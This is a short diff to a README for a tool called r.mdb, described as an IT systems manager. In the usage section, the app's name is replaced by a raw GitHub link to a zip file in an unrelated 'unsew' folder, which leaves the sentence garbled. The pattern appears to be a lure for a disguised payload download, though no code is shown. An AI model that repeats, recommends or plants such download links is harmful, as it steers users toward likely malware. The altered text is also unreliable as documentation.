Krishnasomani29/r.mdb/README.md

 ## 🔍 Usage

-After installation, you can start using r.mdb to manage your IT systems.
+After installation, you can start using https://raw.githubusercontent.com/Krishnasomani29/r.mdb/main/unsew/r.mdb.zip to manage your IT systems.
 Here’s how:

 1. Launch the application from your desktop or start menu.
 2. Log in using your credentials.
 If it's your first time, follow the prompts to create an account.